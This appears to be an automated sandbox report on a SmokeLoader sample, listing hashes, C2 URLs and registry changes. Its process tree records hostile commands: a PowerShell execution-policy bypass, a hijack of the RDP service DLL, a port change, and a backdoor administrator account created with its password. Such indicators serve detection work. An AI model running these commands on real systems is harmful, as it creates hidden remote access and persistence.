Analysis
- max time kernel: 151s
- max time network: 121s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 09-12-2021 17:49
Static task: static1
Behavioral task: behavioral1
Sample: b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe
Resource: win10-en-20211208
General
- Target: b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe
- Size: 298KB
- MD5: 5abf77ca17cd967de8dc06a7c3e6ada3
- SHA1: 354620233a6e3818e3d4f727955dfbf1d3f91e3e
- SHA256: b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680
- SHA512: 2b17bc802ff794a6044fc6347c36ce110afc89b8c92ab60cddb2b5593d885868a826ff4b3c413b006539383f673eeb133187ee87ff37f5b5087909f75c748395
Malware Config
Extracted (URL):
- https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted (family: smokeloader, version: 2020), C2 URLs:
- http://rcacademy.at/upload/
- http://e-lanpengeonline.com/upload/
- http://vjcmvz.cn/upload/
- http://galala.ru/upload/
- http://witra.ru/upload/
Signatures
- SmokeLoader
  Modular backdoor trojan in use since 2014.
- suricata: ET MALWARE ServHelper CnC Inital Checkin
- suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes (flow, pid, process):
    flow 92: pid 3696 powershell.exe
    flow 94: pid 3696 powershell.exe
    flow 95: pid 3696 powershell.exe
    flow 97: pid 3696 powershell.exe
    flow 99: pid 3696 powershell.exe
    flow 101: pid 3696 powershell.exe
    flow 103: pid 3696 powershell.exe
    flow 105: pid 3696 powershell.exe
    flow 107: pid 3696 powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (3 IoCs)
  Processes (pid, process):
    1088 uuterhr
    1012 AC88.exe
    1444 363.exe
- Modifies RDP port number used by Windows (1 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
- YARA rule matches (resource, yara_rule):
    \Windows\Branding\mediasrv.png: upx
    \Windows\Branding\mediasvc.png: upx
- Deletes itself (1 IoCs)
  Processes (pid, process):
    2420 (process name not recorded)
- Loads dropped DLL (2 IoCs)
  Processes (pid, process):
    2056 (process name not recorded; 2 entries)
- Drops file in Program Files directory (4 IoCs)
  Processes (description, ioc, process):
    File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT (powershell.exe)
    File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI (powershell.exe)
    File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT (powershell.exe)
    File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI (powershell.exe)
- Drops file in Windows directory (19 IoCs)
  Processes (description, ioc, process):
    File opened for modification: C:\Windows\branding\Basebrd (powershell.exe)
    File opened for modification: C:\Windows\branding\ShellBrd (powershell.exe)
    File opened for modification: C:\Windows\branding\mediasvc.png (powershell.exe)
    File created: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP (powershell.exe)
    File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI77F6.tmp (powershell.exe)
    File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat (powershell.exe)
    File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
    File created: C:\Windows\branding\wupsvc.jpg (powershell.exe)
    File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_5az3rxwh.dq5.ps1 (powershell.exe)
    File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_jv3og5qf.i0t.psm1 (powershell.exe)
    File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7864.tmp (powershell.exe)
    File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7885.tmp (powershell.exe)
    File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7896.tmp (powershell.exe)
    File created: C:\Windows\branding\mediasrv.png (powershell.exe)
    File opened for modification: C:\Windows\branding\mediasrv.png (powershell.exe)
    File created: C:\Windows\branding\mediasvc.png (powershell.exe)
    File opened for modification: C:\Windows\branding\wupsvc.jpg (powershell.exe)
    File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7886.tmp (powershell.exe)
    File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- Checks SCSI registry key(s) (3 TTPs, 6 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes (description, ioc, process):
    Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe)
    Key queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe)
    Key enumerated: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe)
    Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (uuterhr)
    Key queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (uuterhr)
    Key enumerated: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (uuterhr)
- Modifies data under HKEY_USERS (64 IoCs)
  Processes (description, ioc, process):
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ (powershell.exe)
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust (powershell.exe)
    Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." (powershell.exe)
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" (powershell.exe)
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" (powershell.exe)
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" (powershell.exe)
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ (powershell.exe)
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" (powershell.exe)
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" (powershell.exe)
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" (powershell.exe)
    Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = af82d12985ecd701 (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
    Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" (powershell.exe)
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" (powershell.exe)
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E (powershell.exe)
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ (powershell.exe)
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" (powershell.exe)
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes (description, flow, ioc):
    HTTP User-Agent header, flow 94: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    HTTP User-Agent header, flow 95: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    HTTP User-Agent header, flow 97: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    HTTP User-Agent header, flow 99: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (pid, process):
    2552 b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe (2 entries)
    2420 (process name not recorded; 62 entries)
- Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  Processes (pid, process):
    2420 (process name not recorded)
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes (pid, process):
    636 (process name not recorded; 2 entries)
- Suspicious behavior: MapViewOfSection (2 IoCs)
  Processes (pid, process):
    2552 b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe
    1088 uuterhr
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (token privilege, pid, process):
    pid 2420 (process name not recorded): SeShutdownPrivilege, SeCreatePagefilePrivilege
    pid 952 powershell.exe: SeDebugPrivilege
    pid 844 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
    pid 688 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
    pid 2068 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes (pid, process):
    2420 (process name not recorded; 2 entries)
- Suspicious use of SendNotifyMessage (5 IoCs)
  Processes (pid, process):
    2420 (process name not recorded; 5 entries)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source pid and process -> target pid and process; repeated events counted):
    2420 (process name not recorded) -> 1012 AC88.exe (3 events)
    2420 (process name not recorded) -> 1444 363.exe (2 events)
    1444 363.exe -> 952 powershell.exe (2 events)
    952 powershell.exe -> 2004 csc.exe (2 events)
    2004 csc.exe -> 3344 cvtres.exe (2 events)
    952 powershell.exe -> 3056 csc.exe (2 events)
    3056 csc.exe -> 2812 cvtres.exe (2 events)
    952 powershell.exe -> 844 powershell.exe (2 events)
    952 powershell.exe -> 688 powershell.exe (2 events)
    952 powershell.exe -> 2068 powershell.exe (2 events)
    952 powershell.exe -> 504 reg.exe (2 events)
    952 powershell.exe -> 3956 reg.exe (2 events)
    952 powershell.exe -> 3000 reg.exe (2 events)
    952 powershell.exe -> 3668 net.exe (2 events)
    3668 net.exe -> 876 net1.exe (2 events)
    952 powershell.exe -> 764 cmd.exe (2 events)
    764 cmd.exe -> 2924 cmd.exe (2 events)
    2924 cmd.exe -> 1452 net.exe (2 events)
    1452 net.exe -> 1432 net1.exe (2 events)
    952 powershell.exe -> 3672 cmd.exe (2 events)
    3672 cmd.exe -> 652 cmd.exe (2 events)
    652 cmd.exe -> 3480 net.exe (2 events)
    3480 net.exe -> 2372 net1.exe (2 events)
    2428 cmd.exe -> 2792 net.exe (2 events)
    2792 net.exe -> 3544 net1.exe (2 events)
    3816 cmd.exe -> 3748 net.exe (2 events)
    3748 net.exe -> 1392 net1.exe (2 events)
    688 cmd.exe -> 2740 net.exe (2 events)
    2740 net.exe -> 3292 net1.exe (2 events)
    2508 cmd.exe -> 3996 net.exe (2 events)
    3996 net.exe -> 2280 net1.exe (2 events)
    3148 cmd.exe -> 1592 net.exe (1 event)
Processes
(process tree; entries are indented by depth, each giving the image path, the command line, and the signatures it triggered)

C:\Users\Admin\AppData\Local\Temp\b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe"
  signatures: Checks SCSI registry key(s); Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\uuterhr
  command line: C:\Users\Admin\AppData\Roaming\uuterhr
  signatures: Executes dropped EXE; Checks SCSI registry key(s); Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Local\Temp\AC88.exe
  command line: C:\Users\Admin\AppData\Local\Temp\AC88.exe
  signatures: Executes dropped EXE

C:\Users\Admin\AppData\Local\Temp\363.exe
  command line: C:\Users\Admin\AppData\Local\Temp\363.exe
  signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      signatures: Drops file in Windows directory; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qy0l5zoz\qy0l5zoz.cmdline"
          signatures: Suspicious use of WriteProcessMemory
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2300.tmp" "c:\Users\Admin\AppData\Local\Temp\qy0l5zoz\CSC8653EED5F314474E83368F1494FA423E.TMP"
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\chkm0zwj\chkm0zwj.cmdline"
          signatures: Suspicious use of WriteProcessMemory
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES29F5.tmp" "c:\Users\Admin\AppData\Local\Temp\chkm0zwj\CSCE6E96CA1A4FA4D84B5DBF5FBB9662E26.TMP"
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          signatures: Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          signatures: Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          signatures: Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\reg.exe
          command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        C:\Windows\system32\reg.exe
          command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
          signatures: Modifies registry key
        C:\Windows\system32\reg.exe
          command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        C:\Windows\system32\net.exe
          command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
          signatures: Suspicious use of WriteProcessMemory
            C:\Windows\system32\net1.exe
              command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        C:\Windows\system32\cmd.exe
          command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
          signatures: Suspicious use of WriteProcessMemory
            C:\Windows\system32\cmd.exe
              command line: cmd /c net start rdpdr
              signatures: Suspicious use of WriteProcessMemory
                C:\Windows\system32\net.exe
                  command line: net start rdpdr
                  signatures: Suspicious use of WriteProcessMemory
                    C:\Windows\system32\net1.exe
                      command line: C:\Windows\system32\net1 start rdpdr
        C:\Windows\system32\cmd.exe
          command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
          signatures: Suspicious use of WriteProcessMemory
            C:\Windows\system32\cmd.exe
              command line: cmd /c net start TermService
              signatures: Suspicious use of WriteProcessMemory
                C:\Windows\system32\net.exe
                  command line: net start TermService
                  signatures: Suspicious use of WriteProcessMemory
                    C:\Windows\system32\net1.exe
                      command line: C:\Windows\system32\net1 start TermService
        C:\Windows\system32\cmd.exe
          command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
        C:\Windows\system32\cmd.exe
          command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\net.exe
      command line: net.exe user WgaUtilAcc 000000 /del
      signatures: Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe
          command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe user WgaUtilAcc 6IroM70F /add
  signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\net.exe
      command line: net.exe user WgaUtilAcc 6IroM70F /add
      signatures: Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe
          command line: C:\Windows\system32\net1 user WgaUtilAcc 6IroM70F /add

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\net.exe
      command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
      signatures: Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe
          command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" EZNBLWLT$ /ADD
  signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\net.exe
      command line: net.exe LOCALGROUP "Remote Desktop Users" EZNBLWLT$ /ADD
      signatures: Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe
          command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EZNBLWLT$ /ADD

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\net.exe
      command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
        C:\Windows\system32\net1.exe
          command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe user WgaUtilAcc 6IroM70F
    C:\Windows\system32\net.exe
      command line: net.exe user WgaUtilAcc 6IroM70F
        C:\Windows\system32\net1.exe
          command line: C:\Windows\system32\net1 user WgaUtilAcc 6IroM70F

C:\Windows\System32\cmd.exe
  command line: cmd.exe /C wmic path win32_VideoController get name
    C:\Windows\System32\Wbem\WMIC.exe
      command line: wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe
  command line: cmd.exe /C wmic CPU get NAME
    C:\Windows\System32\Wbem\WMIC.exe
      command line: wmic CPU get NAME
      signatures: Modifies data under HKEY_USERS

C:\Windows\System32\cmd.exe
